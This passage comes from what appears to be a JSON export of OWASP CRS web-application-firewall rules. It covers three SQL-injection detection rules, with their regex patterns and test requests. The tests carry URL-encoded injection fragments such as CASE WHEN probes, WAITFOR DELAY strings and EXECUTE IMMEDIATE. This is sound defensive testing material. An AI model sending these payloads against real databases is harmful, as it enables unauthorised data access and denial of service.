"act_name": "ver", "lineno": 246, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 247, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 248, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 249, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 230 } }, { "rule_id": "942230", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\s\\x0b\\(\\)]case[\\s\\x0b]+when.*?then|\\)[\\s\\x0b]*?like[\\s\\x0b]*?\\(|select.*?having[\\s\\x0b]*?[^\\s\\x0b]+[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z]|if[\\s\\x0b]?\\([0-9A-Z_a-z]+[\\s\\x0b]*?[<->~]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects conditional SQL injection attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "conditional SQL injection attempts", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=%29%20like%20%28", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%29%20like%20%28" } ] }, { "description": "conditional SQL injection attempts", "test_id": 2, "request": { "method": "GET", "uri": "/get?var=%29like%28", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%29like%28" } ] }, { "description": "conditional SQL injection attempts", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=I%20like%20you%21", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=I%20like%20you%21" } ] }, { "description": "conditional SQL injection attempts", "test_id": 4, "request": { "method": "GET", "uri": "/get?var=%20case%20when%20condition1%20then%20result1", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%20case%20when%20condition1%20then%20result1" } ] }, { "description": "conditional SQL injection attempts", "test_id": 5, "request": { "method": "GET", "uri": "/get?var=having%20pain%21", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=having%20pain%21" } ] }, { "description": "conditional SQL injection attempts", "test_id": 6, "request": { "method": "GET", "uri": "/get?var=SELECT%20x%20GROUP%20BY%20SOMETHING%20HAVING%20COUNT%28Id%29%20%3E%3D%209", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=SELECT%20x%20GROUP%20BY%20SOMETHING%20HAVING%20COUNT%28Id%29%20%3E%3D%209" } ] }, { "description": "conditional SQL injection attempts", "test_id": 7, "request": { "method": "GET", "uri": "/get?var=SELECT%20%2A%20FROM%20%60movies%60%20GROUP%20BY%20%60category_id%60%2C%60year_released%60%20HAVING%20%60category_id%60%20%3D%208%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=SELECT%20%2A%20FROM%20%60movies%60%20GROUP%20BY%20%60category_id%60%2C%60year_released%60%20HAVING%20%60category_id%60%20%3D%208%3B" } ] }, { "description": "conditional SQL injection attempts", "test_id": 8, "request": { "method": "GET", "uri": "/get?var=behaving%20badly%2F", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=behaving%20badly%2F" } ] }, { "description": "conditional SQL injection attempts", "test_id": 9, "request": { "method": "GET", "uri": "/get?var=o.havingu%40gmail.com", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=o.havingu%40gmail.com" } ] }, { "description": "conditional SQL injection attempts", "test_id": 10, "request": { "method": "GET", "uri": "/get?var=if%282%3D", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=if%282%3D" } ] }, { "description": "Issue #1914: FP for case", "test_id": 11, "request": { "method": "GET", "uri": "/get?var=Just%20in%20case%20%28abc%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=Just%20in%20case%20%28abc%29" } ] }, { "description": "Issue #2230: FN for case", "test_id": 12, "request": { "method": "GET", "uri": "/get?var=if%281234%3D", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942230 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=if%281234%3D" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 256, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\s\\x0b\\(\\)]case[\\s\\x0b]+when.*?then|\\)[\\s\\x0b]*?like[\\s\\x0b]*?\\(|select.*?having[\\s\\x0b]*?[^\\s\\x0b]+[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z]|if[\\s\\x0b]?\\([0-9A-Z_a-z]+[\\s\\x0b]*?[<->~]", "actions": [ { "act_name": "id", "lineno": 257, "act_quote": "no_quote", "act_arg": "942230", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 258, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 259, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 260, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 261, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 261, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 262, "act_quote": "quotes", "act_arg": "Detects conditional SQL injection attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 263, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 264, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 265, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 266, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 267, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 268, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 269, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 270, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 271, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 272, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 273, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 274, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 275, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 256 } }, { "rule_id": "942240", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)alter[\\s\\x0b]*?[0-9A-Z_a-z]+.*?char(?:acter)?[\\s\\x0b]+set[\\s\\x0b]+[0-9A-Z_a-z]+|[\\\"'`](?:;*?[\\s\\x0b]*?waitfor[\\s\\x0b]+(?:time|delay)[\\s\\x0b]+[\\\"'`]|;.*?:[\\s\\x0b]*?goto)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects MySQL charset switch and MSSQL DoS attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22+WAITFOR+DELAY+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22+WAITFOR+DELAY+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22%3Bwaitfor+delay+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22%3Bwaitfor+delay+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27%3BWAITFOR+DELAY+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27%3BWAITFOR+DELAY+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27%3B+waitfor+delay+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27%3B+waitfor+delay+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27+waitfor+delay+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27+waitfor+delay+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27%3B+WAITFOR+DELAY+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27%3B+WAITFOR+DELAY+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22+WAITFOR+DELAY+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22+WAITFOR+DELAY+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22%3BWAITFOR+DELAY+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22%3BWAITFOR+DELAY+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%22%3Bwaitfor+delay+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%22%3Bwaitfor+delay+%27%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=ALTER+TABLE+%60mass_mails%60+CHANGE+%60receivers%60+%60receivers%60+ENUM%28%27FACILITIES%27%2C%27APPLICATION_2015%27%2C%27APPLICATION_2016%27%29+CHARACTER+SET+utf8%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=ALTER+TABLE+%60mass_mails%60+CHANGE+%60receivers%60+%60receivers%60+ENUM%28%27FACILITIES%27%2C%27APPLICATION_2015%27%2C%27APPLICATION_2016%27%29+CHARACTER+SET+utf8%0A" } ] }, { "description": "Detects MySQL charset switch and MSSQL DoS attempts", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "ALTER+TABLE+%60tx_v3appointment_domain_model_appointment%60+ADD+%60video%60+TEXT+CHARACTER+SET+latin1%0A" }, "expected": { "should_block": true, "rule_ids": [ 942240 ] }, "malicious_patterns": [ { "location": "post_body", "value": "ALTER+TABLE+%60tx_v3appointment_domain_model_appointment%60+ADD+%60video%60+TEXT+CHARACTER+SET+latin1%0A" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 282, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)alter[\\s\\x0b]*?[0-9A-Z_a-z]+.*?char(?:acter)?[\\s\\x0b]+set[\\s\\x0b]+[0-9A-Z_a-z]+|[\\\"'`](?:;*?[\\s\\x0b]*?waitfor[\\s\\x0b]+(?:time|delay)[\\s\\x0b]+[\\\"'`]|;.*?:[\\s\\x0b]*?goto)", "actions": [ { "act_name": "id", "lineno": 283, "act_quote": "no_quote", "act_arg": "942240", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 284, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 285, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 286, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 287, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 287, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 288, "act_quote": "quotes", "act_arg": "Detects MySQL charset switch and MSSQL DoS attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 289, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 290, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 291, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 292, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 293, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 294, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 295, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 296, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 297, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 298, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 299, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 300, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 301, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 282 } }, { "rule_id": "942250", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i:merge.*?using\\s*?\\(|execute\\s*?immediate\\s*?[\\\"'`]|match\\s*?[\\w(),+-]+\\s*?against\\s*?\\()", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects MATCH AGAINST, MERGE and EXECUTE IMMEDIATE injections", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Find EXECUTE IMMEDIATE injection", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=EXECUTE%20IMMEDIATE%20%22", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942250 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=EXECUTE%20IMMEDIATE%20%22" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 303, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:merge.*?using\\s*?\\(|execute\\s*?immediate\\s*?[\\\"'`]|match\\s*?[\\w(),+-]+\\s*?against\\s*?\\()", "actions": [ { "act_name": "id", "lineno": 304, "act_quote": "no_quote", "act_arg": "942250", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 305, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 306, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 307, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 308, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 308, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 309, "act_quote": "quotes", "act_arg": "Detects MATCH AGAINST, MERGE and EXECUTE IMMEDIATE injections", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 310, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 311, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 312, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 313, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 314, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 315, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 316, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 317, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 318, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 319, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 320, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 321, "act_quote": 